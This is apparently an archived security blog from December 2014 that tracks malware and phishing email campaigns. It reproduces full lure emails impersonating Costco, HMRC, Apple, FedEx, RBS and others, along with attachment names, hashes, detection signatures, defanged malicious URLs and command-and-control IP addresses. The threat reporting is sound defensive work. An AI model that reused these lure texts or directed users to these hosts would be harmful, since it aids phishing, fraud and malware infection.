Wednesday, 31 December 2014

Costco Acceptance of Order malware

Costco Acceptance of Order malware has just arrived in time for the New Year...

Headers:
From: Costco
Reply-To: Costco
Subject: Acceptance of Order
Message body:
Our online store Costco.com received an order and the personal data of the recipient coincide with yours.

You may get your order in the nearest Local Store.

Attention! Your order can be reserved within 4 days.

You may see order details here.

Truly yours,
Costco.com


Clicking on the link with a Windows system gives you a zip file (name based on IP address location)

Costco_OrderID-110143-Nantwich.zip
Clicking on the link with an non-Widows system...Yes, Windows 9x...




On the Windows machine, Inside the zip, is Windows executable:
Costco_OrderID-110143-Nantwich.exe


VirusScanner Reports:
Md5 Hash: 01bfae48c34156b7a9aa4c01d6988110
VirusTotal Report : [ 8 / 55] (a variant of Win32/Kryptik.CULP)
Malwr Report
Hybrid-Analysis Report
Cheers,

Steve
Sanesecurity.com

Tuesday, 30 December 2014

new job - money making scam

I've got a job....up to $5000 per month :O

Message:
Good day!

We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.

We cooperate with different countries and currently we have many clients in the world.
Part-time and full-time employment are both currently important.
We offer a flat wage from $1500 up to $5000 per month.

The job offers a good salary so, interested candidates please registration on the our site: www DOT thinkedmoney DOT com

Attention! Accept applications only on this and next week.

Respectively submitted
Personnel department

The domain name details:


   Domain Name: THINKEDMONEY.COM
   Registrar: BIZCN.COM, INC.
   Whois Server: whois.bizcn.com
   Referral URL: http://www.bizcn.com
   Name Server: NS1.AGERMAINVA.NET
   Name Server: NS2.AGERMAINVA.NET
   Updated Date: 29-dec-2014
   Creation Date: 29-dec-2014

   Registrant Name: Madeline Goode
   Organization: Madeline T. Goode
   Street: 4824 Pheasant Ridge Road
   City: Philadelphia
   State/Province: PA
   Postal Code: 19126
   Country: us
   Phone: +1.2155496172
   Phone Ext:
   Fax: +1.2155496172
   Fax Ext:
   Email: info@thinkedmoney.com
Or... maybe not.

Cheers,

Steve
Sanesecurity.com

HM Revenue & Customs - Kathy Donnelly - HMRC Tax Credit Office phishing

Here's a HMRC phishing email with a zip attachment....

Headers:
From: "HM Revenue & Customs"{online-service@HMRC.gov.uk}
Subject: Tax Refund Message!

Message:
Dear Applicant,

The contents of this email and any attachments are confidential and as
applicable, copyright in these is reserved to HM Revenue & Customs.
Unless expressly authorised by us, any further dissemination or
distribution of this email or its attachments is prohibited.

If you are not the intended recipient of this email, please reply to
inform us that you have received this email in error and then delete it
without retaining any copy.

I am sending this email to announce: After the last annual calculation of
your fiscal activity we have determined that you are eligible to receive a
tax refund of 244.79 GBP

You have attached the tax return form with the TAX REFUND NUMBER ID: 381716209,
complete the tax return form attached to this message.

After completing the form, please submit the form by clicking the SUBMIT
button on form and allow us 5-9 business days in order to process it.

Our head office address can be found on our web site at HM Revenue & Customs: http://www.hmrc.gov.uk

Sincerely,

 Kathy Donnelly,
 HMRC Tax Credit Office
 Preston
 TAX REFUND ID: UK681716209-HMRC

© Copyright 2014, HM Revenue & Customs UK All rights reserved.

The attachment is a zip file:
HM Revenue & Customs - HS380 Form.zip

Inside the zip file is a standard html file:
HM Revenue & Customs - HS380 Form.html

 If you access the html file with a browser you get a fake HMRC form, asking for all your
payment credit/debit card details:




The data from this form is then posted to a fake form address:

div class="portlet-body">
name="processForm" method="POST" onsubmit="return submitIt(this)">
Cheers,

Steve
Sanesecurity.com

Apple Account phishing

Overnight there's been a big Apple phishing push, no doubt timed for Apple based Christmas presents
that people have received.

Lots of different From addresses and Subjects.

Sample Message headers:
From: "Apple Org" {support@apple.cm}
Subject: Account temporarily suspended - action required

From: "AppleID Support" {support@apple.cm}
Subject: Your Apple account requires verification

From: "Your Apple support" {zonaprieta@moldran.com}
Subject: Account information expired

From: "Apple Co" {skearney@packeteer.com}
Subject: Account deactivated - action required

From: "Apple Org" {support@apple.cm}
Subject: Account information update required

From: "Apple support" {mclean@libtrade.com}
Subject: Your account information needs to be updated

From: "AppleID Support" {angie.gonzalez@investrmi.com}
Subject: Billing information update required

From: "Apple Ltd" {support@apple.cm}
Subject: Please update your account details

From: "Apple Co" {webmaster@sbcglobal.net}
Subject: Please confirm your billing details

From: "AppleID Support" {support@apple.cm}
Subject: Apple account verification required

From: "Your Apple support" {support@apple.cm}
Subject: Please update your account details

From: "Your Apple support" {support@apple.cm}
Subject: Billing information expired

From: "Apple Org" {enji_murata@jedstock.com}
Subject: Billing information update required

From: "Your Apple support" {support@apple.cm}
Subject: Account verification failed

From: "Apple SarL" {support@apple.cm}
Subject: Please confirm your account details

Sample Message body:
Dear customer,
It has come to our attention that the Billing Information associated with your account are out of date. To maintain account safety and to ensure that the account is in the right hands it is required for you to update your Billing information.
Failure to update your records within 7 days will result in account termination.
Click on the reference link below and update your billing information on the following page to complete account verification:
Thanks,
Apple Customer Support

The above link to Apple site, doesn't take you there but instead takes you to a fake phishing site:
h t t p://authorize-icloud DOT com/uk/index.html
The fake phishing site above looks like this:

Cheers,

Steve
Sanesecurity.com

Monday, 29 December 2014

imagen - Enviado desde mi iPhone malware

Small malware run just coming in....

Message:
Subject:  imagen
From: n-spragg@yahoo.es
Date: Mon, December 29, 2014 12:32 pm
-
Enviado desde mi iPhone
-

Attachment:


img-3633691.jpeg.zip



Inside Zip file:


img-0980001.jpeg.exe



Note the double extension attachment, trying to display as a picture file....
but is actually an exe file.


Scanner Reports:


VirusTotal: f4ce3ede3f8c1f8afd1646cc2d700621 [7/56 scanners]
Hybrid-Analysis
Malwr Report
Cheers,

Steve
Sanesecurity.com

dating spam: Hi my friend! - My name is Elena

At the moment, the emailed malware seems to have dried up... but instead we're seeing lots of
holiday dating spam emails, like this example (the email address is pretty random):

Hello!!!

My name is Elena.
I looked yours profil and have become interested in you.
I live in Russia in city Cheboksary.
If you have become interested in me.

Write to me at once on mine e-mail: zinfira.klikina@yandex.ru

I shall tell to you more about myself also I shall send you my photos.
I wait for yours the letter and a photo.

Elena.

Here's another example:

Good time of the day!
I am very sensitive, kind, tender lady http://mow DOT so/RovIWQWM
My friends say i have genuine  sense of humor.
I hope for a real meeting with a man  who has serious
intentions and wants to create harmonious relationship.
I hope he will be kind, reliable, loving man and caring
person.
Goodbye
Alexandry


Cheers,

Steve
Sanesecurity.com

Friday, 26 December 2014

Emma Jones - sakaitrading: rtf document and rar malware (+1412718912)

A single email arrived today, with a couple of interesting attachments...

From: "Sakai Trading Inc" e.jones@sakaitrading.com
Date: Fri, 26 Dec 2014 04:40:27 +0000
Subject: Fw: 2x40ft containers New York Long Beach

Hello

Please find attached and quote for us your best price to New York Long Beac=
h. We need to know the exact mass production time needed after paying the d=
eposit payment and also the aprox delivery time to New York Long Beach by s=
ea. What are your payment terms? Can you accept LC at sight or cash against=
 document payment?
Also we need to know if we can visit your place after new year so we can ta=
ke a look on the production process there.

Thank you
Regards
Emma Jones
Sakai Trading Company Inc
3300 Polo Place, Bronx, New York, 10453, USA
Tel: +1412718912
Fax: +4127118910


Attached to the above email are two files...

 2x40ft containers New York Long Beach USA.doc and 2x40ft containers New York Long Beach USA.rar.

 2x40ft containers New York Long Beach USA.rar contains a .pif executable, in a folder:

2x40ft containers New York Long Beach USA\2x40ft containers New York Long Beach USA.pif and
it reported on VirusTotal as:

[Hash: fc6d66e5bf18b5f55aa847f08a32a25] (3/56) and contains  Trojan[Backdoor]/Win32.Androm
Malwr Report [here]

The 2x40ft containers New York Long Beach USA.doc file, is reported on VirusTotal as:

[Hash: aa76b4d979ebf24437a4335a11dba98] (13/56) and contains Exploit.RTF.CVE-2012-0158
Malwr Report [here] shows that it steals information from browsers
 
Cheers,

Steve
Sanesecurity.com

Wednesday, 24 December 2014

Postal Notification Service Fedex malware

New FedEx malware incoming...

From:     "Fedex" personificationztx986@newmasternetgroup.com
Subject: Postal Notification Service

Dear Customer,

  Your parcel has arrived at December 12. Courier was unable to deliver the parcel to you.
  To receive your parcel, print this label and go to the nearest office.


The link inside the email is a direct link to download a piece of malware...

minager DOT com/notification DOT exe

Malwr report here: [Malwr]

VirusTotal Report here [7bd2d408c56d9cc0a23806b4a24997ee]

Cheers,

Steve
Sanesecurity.com

Rhianna Wellings teckentrupdepot.co.uk Signature Invoice 44281 word document malware

More macro based malware this time from Rhianna Wellings of teckentrupdepot, whose
name and company name are being used to make the malware look a bit more genuine:

From: Rhianna Wellings Rhianna@teckentrupdepot.co.uk
Subject: Signature Invoice 44281
Date: Wed, 24 Dec 2014 11:56:30 +0300
 

Your report is attached in DOC format.

To load the report, you will need the Microsoft Word reader, available to download at http://www.microsoft.com
 

The attachment is Signature Invoice.doc

Two variants so far... with VirusTotal reporting no scanners picking it up:

38368ef451cbe4120f427e4b79405c6c
7de7706ab70a440069ef17c2b8656919

Sanesecurity are detecting this as:

Sanesecurity.Malware.24646.DocHeur (phish.ndb)
Sanesecurity.RogueDoc.0hr.20141224-0904 (rogue.hdb)

Decoded macro here: (pastebin)

Latest Malwr Report here: (Malwr)

teckentrupdepot.co.uk have put a note about the issue and updated their website:

Important Information
We are currently experiencing an IT issue where one of our email addresses has been spoofed. If you have received an email with a suspicious attachment then please delete it. You need do nothing further as we have identified the machine which is outside of our organisation and are working with them to remedy the problem. Sorry for any inconvenience.




NOTE


The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))


Cheers,

Steve
Sanesecurity.com

Tuesday, 23 December 2014

Dawn Early ADP Invoice malware

 A zipped malware run has just started...


From: "Dawn.Early@adp.com" Dawn.Early@adp.com
Date: Thu, 24 Jul 2014 09:38:34 GMT
Subject: ADP Invoice for week ending 12/21/2014


Your most recent ADP invoice is attached for your review.

If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.

Thank you for choosing ADP for your business solutions.

Important: Please do not respond to this message. It comes from an unattended mailbox.


The Attachment in this example is:  invoice_41298491.zip, which actually has a executable called
invoice_41298491.scr inside it.

MD5 hash and VirusTotal Report: [9c325ce702a2ed871bab947b828f6ae5]

The Anubis report can be found here [Anubis]


Cheers,

Steve
Sanesecurity.com

You have received a voice mail: malware

More incoming malware...

You received a voice mail : VOICE459-973-9894.wav (27 KB)
Caller-Id: 459-973-9894
Message-Id: 8V7XOJ

This e-mail contains a voice message.   

Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

The attachment is supposed to a voice mail (wav file) but instead the zip contains .SCR
executable file:

Voice347-237-2718.scr

Current md5 hash and VirusTotal report [1/56]:

5c37a7a69b739f45607dd3106163034f

 Currently being blocked by:

Sanesecurity.Rogue.0hr.20141223-1148

Cheers,

Steve
Sanesecurity.com

Remittance Advice (malware excel attachment)

Another incoming excel attachment with macro...

From: "Hood"  (random from address)
Subject: Remittance Advice -FHAX74
(random reference)


Confidentiality and Disclaimer:  This email and its attachments are intended for the addressee only and may be confidential or the subject of legal privilege.
If this email and its attachments have come to you in error you must take no action based on them, nor must you copy them, distribute them or show them to anyone.
Please contact the sender to notify them of the error.  



This email and any attached files have been scanned for the presence of computer viruses. However, you are advised that you open any attachments at your own risk.
Please note that electronic mail may be monitored in accordance with the Telecommunications (Lawful Business Practices)(Interception of Communications) Regulations 2000.



 The Attachment, for example FHAX74.xls contains a macro code to download extra malware onto
you system.   The attachment filename is random.

Md5 hashes so far and report clean from VirusTotal:

013c90d7a07e365e82fd8ed0103efbe9
378a36d9d110251717de6061411f6714

Decoded macro here: (pastebin)

Sanesecurity signatures are blocking this one as:

Sanesecurity.Malware.24675.XlsHeur.UNOFFICIAL FOUND

Just to show you the sort of numbers involved in these virus runs... per hour... that one site is
receiving...





NOTE


The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))


Cheers,
Steve
Sanesecurity.com

CHRISTMAS OFFERS: Jayne route2fitness.co.uk: (attached word malware)

Looks like some new word macro malware is incoming...
with no message body.... but does have an attached file:

From: "Jayne" Jayne@route2fitness.co.uk
Subject: CHRISTMAS OFFERS.docx


Currently the attached filename is: CHRISTMAS OFFERS.doc

As suspected it's a word macro malware.

Sanesecurity signatures are blocking this one as:

Sanesecurity.Malware.24646.DocHeur.UNOFFICIAL FOUND

Hashes so far... and ALL VirusTotal scanners are showing clean :(

76990032cc123694595913f1cc799e0e
9d0b2db07a5c5a903e0d599c8fcc63ca

Decoded macro here: (pastebin)

Route 2 Fitness is a Sports Club and won't have anything to do with the malware,
they are just being used as a target :(

Just to show you the sort of numbers involved in these virus runs... per hour... that one site is
receiving...




NOTE


The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))



Cheers,

Steve
Sanesecurity.com

Monday, 22 December 2014

word document malware: AquAid card receipt: "Tracey Smith"

Once again AquAid have been targeted again for today's malware run of a macro
 infected word document...

Example...

From: "Tracey Smith"
Subject: Card Receipt
Date: Mon, 22 Dec 2014 12:56:58 +0400




Hi

Please find attached receipt of payment made to us today

Regards

Tracey




Tracey Smith| Branch Administrator

AquAid | Birmingham & Midlands Central

Unit 35 Kelvin Way Trading Estate | West Bromwich | B70 7TP

Telephone:        0121 525 4533

Fax:                  0121 525 3502

Mobile:              07795328895

Email:               tracey.smith@aquaid.co.uk


AquAid really is the only drinks supplier you will ever need with our huge product range. With products ranging from bottled and mains fed coolers ranging up to coffee machines and bespoke individual one off units we truly have the right solution for all environments. We offer a refreshing ethical approach to drinks supply in that we support both Christian Aid and Pump Aid with a donation from all sales.  All this is done while still offering a highly focused local service and competitive pricing. A personalised sponsorship certificate is available for all clients showing how you are helping and we offer £25 for any referral that leads to business.

*********************************************************************
AquAid Franchising Ltd is a company registered in England and Wales with registered number 3505477 and registered office at 51 Newnham Road, Cambridge, CB3 9EY, UK. This message is intended only for use by the named addressee and may contain privileged and/or confidential information. If you are not the named addressee you should not disseminate, copy or take any action in reliance on it. If you have received this message in error please notify the sender and delete the message and any attachments accompanying it immediately. Neither AquAid nor any of its Affiliates accepts liability for any corruption, interception, amendment, tampering or viruses occurring to this message in transit or for any message sent by its employees which is not in compliance with AquAid corporate policy.


 At the moment these are the md5 hashes...with VirusTotal results shown:

7f023b169da30a68c45080b81e6841a3

c696a8312557f2754bc4d3ddf63ff38f
 ed176c4c7a5b5d13928b15f09581d0fa

Decoded macro here: (Pastebin)



NOTE


The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro embedded inside the attachment.

The auto-download file is normally a windows executable and so will not currently run on  any operating system, apart from Windows.

However, if you are an Apple/Android user and forward the message to a Windows user, you will them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))



Cheers,

Steve

Friday, 19 December 2014

Malware: Sage Invoice

Another Sage invoice, which is is supposed to be a pdf...

Date: Fri, 19 Dec 2014 13:42:58 +0200
From: "Sage"
Subject: FW: Invoice_8822271 ~

Please see attached copy of the original invoice (sage_invoice_127139_982109.pdf)

sage_invoice_127139_982109.zip


Zip contains sage_invoice_127139_982109.scr (which is executable)


Submitting to VirusTotal:

Md5 hash: 77a103ddd3fcb414d9cd5fe8f353c87 [6/55]

Cheers,

Steve
Sanesecurity

Excel malware: BACS payment Ref

More macro malware... this time from "BACS"

Date: Fri, 19 Dec 2014 11:55:31 +0200
From: "Buck Bean" (Names and Addresses are random)
Subject: BACS payment Ref:026919ZL (Ref is random)
 

Please see below our payment confirmation for funds into your account on =
Tuesday re invoice 026919ZL

Attached is an excel file: 026919ZL.xls (filename is random)

Four variants  so far...

MD5 hash: 3b21e1fb5d4fb2d67bcfc716a57ad41c [0/56]
MD5 hash: 827803f959140b728d66adb4b209b619 [0/56]
MD5 hash: ba4ab13558df82e4b6c347828a130a06 [0/56]
MD5 hash: 0eed6374118743dcaf207df327d5fa07 [0/56]

Detection added:

Sanesecurity.Malware.24675.XlsHeur
Sanesecurity.Rogue.0hr.20141219-1104

The decoded macro is here: pastebin

Just a reminder about opening the document with other devices and Online VirusScanners:

Cheers,

Steve
Sanesecurity.com

Malware: Tiket alert FBR service

Just arriving...

From:     "FBR service"
Subject: Tiket alert

Look at the attached file for more information.

Assistant Vice President, FBR service
Management Corporation

The attached Zip file alert_info.zip actually contained an EXE file called:


my_ass_foto_2347329847893274823798.exe

Hmmm... I think a malware writer forgot to rename the file from the earlier run.. lol

hash: aeb39690df91438edcef14bc64ddd982

Cheers,

Steve
Sanesecurity.com

Malware: hola mi foto :)

An incoming email, containing a short message:

hola mi foto :)

... except it's got a Zip attachment, called my.zip.

Inside the above Zip, is a randomly named exe file...

my_ass_foto_2347329847893274823798.exe

Fire it off to VirusTotal and well, it's scoring 0/54 at the moment..

Hash:  aeb39690df91438edcef14bc64ddd982

Cheers,

Steve
Sanesecurity.com 

malware: fake FedEx Priority Overnight email

I've seen fake FedEx emails before...

Subject: Delivery Status Notification
From: "FedEx Priority Overnight"
 
  FedEx
 
  Dear Customer,
 
  Your parcel has arrived at December 12. Courier was unable to deliver the parcel to you.
  To receive your parcel, print this label and go to the nearest office.

  Get Shipment Label
 
  FedEx 1995-2014


Screen grab...



If you "hover" the mouse of the "Get Shipment Label":

 


Hmmm... doesn't seem legit at all... and you're correct it's not.

What is interesting if you clicked on the link... the downloaded file is named to be Label-, followed
by your IP locations details...

eg.

Label-Winsford-CW7.zip

Inside the above zip is: Label-Winsford-CW7.exe

All of which is designed to make the email seem legit, as they have your Location and Postcode !

A typical Get your Location details from your IP address/Browser can be found here:  https://freegeoip.net/


I've run the file through Jotti and VirusTotal:

Hash: (94c5fb4c6c6fc1da555a909b63784e1) Jotti: [6/22]
Hash: (94c5fb4c6c6fc1da555a909b63784e1) VirusTotal: [10/56]


Generally, it seems to be: Win32/Kryptik.CTFL

Cheers,

Steve
Sanesecurity.com


Thursday, 18 December 2014

Windows: Online Virus Scanners

Hopefully most people should have some anti-virus software in place, but another Anti-Virus opinion is always a good thing to have, when dealing with current malware.

Here's three online virus scanners, which have proved to be good for me... but your mileage may vary:

Eset
Kaspersky
F-Secure

 Disclaimer: obviously use the above scanners at your own risk etc.


malware: rbs account incident

More incoming nasties...

From: "Les Caron" (and other "random names/addresses)
Subject: RE: Incident IM02023830 (random reference)

Good Afternoon ,

Attached are more details regarding your account incident.

Please extract the attached content and check the details.

Please be advised we have raised this as a high priority incident and will endeavour to resolve it as soon as possible. The incident reference for this is IM02023830.


We would let you know once this issue has been resolved, but with any further questions or issues, please let me know.

Kind Regards,

Les Caron

Level 2 Adviser | Customer Experience Team, IB Service & Operations 7th Floor, 1
Hardman Boulevard | Manchester | M3 3AQ | Depot code: 049
Tel: 0845 300 4108 |Email: Les.Caron@rbs.co.uk The content of this e-mail is CONFIDENTIAL unless stated otherwise


Inside the zipped attachment is:


IM0743436407_pdf.scr

Again: it's NOT a pdf file but an executable screen saver file.

Submitting the file (hash: 9513595daf2c327d1be65f79aaafb70f) to VirusTotal give us
a hit rate of [5/56]

Cheers,

Steve
Sanesecurity.com

malware: Myfax Internet Fax Job

Just received a "Myfax fax" for a new job....
 
Date: Thu, 18 Dec 2014 12:27:41 +0000
From: "MyFax" 
Subject: Internet Fax Job

Fax image data
http:/ / neyeradvisors DOT com/documents/fax.html
 
 
If you click on the random(ish) link (don't btw) you'll get a zip file,
which contains: 
 
fax8642174_pdf.exe
 
Note: it's an executable file and NOT a pdf.
 
Submitting the file to VirusTotal gives us a report of:
 
bb188ef8590840b72e4fa762e7e99124 (2/56 scanners hit)
 
Needless to say, the only job you'll get from this, it a PC cleaner :(
 
Detected as Sanesecurity.Malware.24672 (phish.ndb)
 
Cheers,
 
Steve
Sanesecurity.com 
  
 
 

word/excel macro malware: other devices

The current round of Word and Excel attachments are targeted at Windows users.

Apple and Android software can open these attachments and may even manage to run the macro
embedded inside the attachment.  

However, the auto-download file is normally a windows executable and so will not currently run on these two operating systems.

However, if you are an Apple/Android user and forward the message to a Windows user, you will
them put them at risk of opening the attachment and auto-downloading the malware.

Currently these attachments try to auto-download Dridex, which is designed to steal login information regarding your bank accounts (either by key logging, taking auto-screens hots or copying information from your clipboard (copy/paste))

Cheers,

Steve
Sanesecurity.com

word document malware: AquAid receipt of payment

Just receiving  a whole load of these faked AquAid invoices containing an embedded macro:

From: "Tracey Smith"
Subject: Card Receipt
Date: Thu, 18 Dec 2014 09:26:42 +0200

Hi

Please find attached receipt of payment made to us today

Regards

Tracey
Tracey Smith| Branch Administrator
AquAid | Birmingham & Midlands Central
Unit 35 Kelvin Way Trading Estate | West Bromwich | B70 7TP
Telephone:        0121 525 4533
Fax:                  0121 525 3502
Mobile:              07795328895
Email:               tracey.smith@aquaid.co.uk


Two variants at the moment... VirusTotal reports:

a881b1031959d5dae6352f31b6ba2df3 (2/56)
eb6db8890657f982118699f019812fdd (1/53)

Detection:

Sanesecurity.Malware.24670.DocHeur (phish.ndb)
Sanesecurity.Rogue.0hr.20141218-0835 (rogue.hdb)

The embedded macro can be seen here (pastebin)
Malwr report can be seen here (Malwr

One sample tries to connect to two hosts:

74.208.11.204 (USA)
81.169.156.5 (Germany)

Cheers,

Steve
Sanesecurity.com

Example Stats of a Macro document malware run

Most people will get a few copies of a certain type of virus and I though it might be of interest to see an example of how many viruses a certain organisation may get.

In the graph below, it shows a snapshot of Virus/Spam items caught by Sanesecurity signatures (Top 5 only)
per hour, yes, per hour:














Sanesecurity_Malware_24646_DocHeur_UNOFFICIAL (which is a generic macro detection signature) blocked a maximum of 16,644  in ONE HOUR... that's a big bot net someone has control of.

What's also interesting to see it how long a typical malware run lasts for.

Cheers,

Steve
Sanesecurity.com

Wednesday, 17 December 2014

malware: Sage Invoice / Outdated Invoice

Date: Wed, 17 Dec 2014 13:06:41 +0200
From: "Sage Invoice" 
Subject: Outdated Invoice

Sage Account & Payroll

You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow  to view/download your account invoice:

http://northinc DOT com/yazbnartya/vbyygudryl.html 
 
 
The above random link, downloads document9213.zip, which contains document9213.scr.
 
Submitted this to VirusTotal:
 
(hash: e8f063aff9cec2a2e3edcf48b780801a) (3/53)
 
Detected as: Sanesecurity.Malware.24668 (phish.ndb)
 
Cheers,
 
Steve
Sanesecurity.com 

Excel Malware: PL REMITTANCE Integra Finance

Another macro based malware incoming, using Excel

From: "Frederic Nichols" 
Subject: PL REMITTANCE DETAILS ref825235IN

The attached remittance details the payment of £720.58 made on
16-DEC-2014 by BACSE.

This email was generated using PL Payment Remittance of Integra Finance System.

Can you please check that your supplier details are correct, if any
changes are required please email back to this email address quoting
your remittance reference.

825235IN.xls (random filename)

 
Four Variants (md5 hashes below)
 

12a329ec30a90b57ad5d65261a03038c
666a50998673aca9abc1b54be355a950
7c9e2b80062f7e5c7faa8a97ea134df1
80e98b1dbc5af0e40e4fa0b96e181c14
 

Detected as: 
 
Sanesecurity.Rogue.0hr.20141217-1001 (rogue.hdb)
Sanesecurity.Malware.24667.XlsHeur (phish.ndb)
 
Update: the live malware from one of the download locations, seems to
have been run by 96,120 people already :(
 
h t t p : / / [remove]38 DOT 96 DOT 175 DOT 139:8080/stat/stati.php
 
 
Cheers,
 
Steve
Sanesecurity.com 
 

document malware: UAE EXCHANGE PAYMENT INSTRUCTION

This one has just landed...

Subject: UAE EXCHANGE 32,000USD PAYMENT INSTRUCTION
To: finance@uaeexchange.com
From: "finance@uaeexchange.com"
Date: Wed, 17 Dec 2014 08:43:13 +0000
Reply-To: 123@GMAIL.COM

Hello,

Please find attached payment instruction below and fill in the details as y=
our client has requested from us to send you the payment before Friday 19th=
 Dec 2014.
Fill in and resend the attached payment instruction to our email below so w=
e can proceed with the payment immediately once we receive your response.
Your earlier reply is appreciated to avoid delay in payment process and avo=
id delay in our customer goods shipment.
If you have any questions you can call our numbers detailed or email to us =
with any assiatance needed.

Thank you
Best Regards
Sohel A Gani
Dubai International City
Shop No. 1, CBD 29, Al Warsan First, International City, Dubai
Phone: +971-4-4312691
Fax: +971-4-4310931
Email: Finance@uae-exchange.com
Business Hours: Sat - Thu: 8:00 A.M. - 10:00 P.M., Fri: 8.00 A.M. =E2=80=93=
 11.30 A.M, 1.30 P.M. =E2=80=93 10.00 P.M.=20
 

Contains two documents, a Word document (.doc) and a Microsoft Office Open XML format .ppsx document:

UAE EXCHANGE 32,000USD PAYMENT INSTRUCTION.doc (VirusTotal)
[Exploit.RTF.CVE-2012-015]

UAE EXCHANGE 32,000USD PAYMENT  INSTRUCTION.ppsx (VirusTotal)
[Exploit.CVE-2014-6352]

Cheers,

Steve
Sanesecurity.com

word document macro based malware: UK GEOLOGY PROJECT by \"Rough & Tumble\" with \"Moussa Minerals\"

Another malware run... with attached word document malware embedded :(

Date: Wed, 17 Dec 2014 16:20:09 +0800
From: "UK GEOLOGY PROJECT by \"Rough & Tumble\" with \"Moussa Minerals\""
Subject: Invoice as requested

No body of text this time, just an attachment...

20140918_122519.doc



Two variants so far.. VirusTotal Reports:

e832f74d424084e79505730f3b1faabc (1/54)
ff0694cba3b1ba6b39c997528385e649 (1/53)

0 hour detected by:

Sanesecurity.Malware.24646.DocHeur.UNOFFICIAL (phish.ndb)
anesecurity.Rogue.0hr.20141217-0828 .UNOFFICIAL (rogue.hdb)

Embedded Macro: pastebin

Malwr report: here

Tuesday, 16 December 2014

cab file malware: Banking account Notification

 A huge amount of fake banking malware it hitting here... this time using .CAB (Microsoft Cabinet) archives,
inside of which contains a .SCR file:


Date: Tue, 16 Dec 2014 14:07:03 +0100
From: "Barbar Wheelus"
To: itsupport@newburydata.co.uk
Subject: Notice #J-19584HA-60644

===========================================
This is an automatically generated email. Please do not reply as the email address is not monitored for received mail.
===========================================

Notification Number: 5317568
Mandate Number: 1601102
Date: December 16, 2014. 01:42pm

In an effort to protect your Banking account, we have frozen your account until such time that it can be safely restored by you. Please view attached file "J-19584HA-60644.cab" for details.

Regards,
Barbar Wheelus
+07805 544772


There seems to be quite a few varients at the moment...

However one version scanned with VirusTotal shows it's Kryptik.CCQZ :(

These are being blocked by...

Sanesecurity.Malware.24664
Sanesecurity.Malware.24665.ExeHeur

Monday, 15 December 2014

doc macro malware: IFS Applications vitacress.co.uk

Looks like another document containing macro malware has begin to be spammed out...

Date: Mon, 15 Dec 2014 04:45:32 -0300
From: IFS Applications
Subject: DOC-file for report is ready

The DOC-file for report Payment Advice is ready and is attached in this mail.
 

Payment Advice_593016.doc

41c4dd8ed6597723155aae653ad6a1e8
627de756499c17062a994351cc6388bd

VirusTotal Reports no Anti-Virus software picking it up :(

Sanesecurity ClamAV signatures are blocking this one though using...

Sanesecurity.Malware.24646.DocHeur.UNOFFICIAL FOUND (phish.ndb)
Sanesecurity.Rogue.0hr.20141215-0816.UNOFFICIAL FOUND (rogue.hdb)

Current Malwr report here shows malware contacting host 74.125.28.139

Decoded macro here (Pastebin)

Cheers,

Steve
Sanesecurity.com

Thursday, 11 December 2014

Word or Excel macro security for Dridex

Most of the recent spam runs containing Word or Excel macro based malware will download Dridex malware onto your system if  the attached Word/Excel managed to execute the Macro inside it.

For a while now, Office is set to block macros by default, however, the attachment may try to trick you into
enabling macros manually - so don't try to

Dridex if run,will  keep an eye on online banking activity and if is see any, will grab as much information as possible from your system, for example by taking screengrabs, grabbing the bank forms you are filling in etc.

Microsoft has a guide to Macro Security, which is well worth reading here

doc malware: Important Docs rbs

Another RTF (Rich Text Format) word based malware run, similary to today's earlier exploit...

Date: Thu, 11 Dec 2014 12:37:07 +0000
From: "Shelton Aaron"
Subject: Important Docs

Please review attached documents regarding your account.

Tel:  01322 609167
Fax: 01322 395148
email: Shelton@rbs.co.uk

This information is classified as Confidential unless otherwise stated.


The attached RTF (Rich Text Format) document RBS_Account_Documents.doc is detected as:

Sanesecurity.Rogue.0hr.20141211-1259

Cheers,

Steve
Sanesecurity.com

Employee Documents - Internal Use malware


From: "eBay.com" Subject: Employee Documents - Internal Use
Message-ID: <02445414490536603757052027200341 ebay.com="">

DOCUMENT NOTIFICATION, Powered by NetDocuments

DOCUMENT NAME: Employee Documents

DOCUMENT LINK: http://matoa-indonesia DOT com/do/document.php

Documents are encrypted in transit and store in a secure repository

---------------------------------------------------------------------------------
This message may contain information that is privileged and confidential.
If you received this transmission in error, please notify the sender by reply email
and delete the message and any attachments.


The above is already blocked with Sanesecurity.Malware.24222.UNOFFICIAL

However, if you do click the link, it auto-download (via your browser) document8721_pdf.zip

The zip file contains document8721_pdf.exe and VirusTotal is currently reporting [3/56] hits

word document malware: INCOMING FAX REPORT

New word attachment, loaded with a Rich Text Format document to download malware.

This time, it's an incoming fax...

Date: Thu, 11 Dec 2014 03:17:44 -0800
From: "Incoming Fax"
Subject: INCOMING FAX REPORT : Remote ID: 794-474-7335

*********************************************************
INCOMING FAX REPORT
*********************************************************

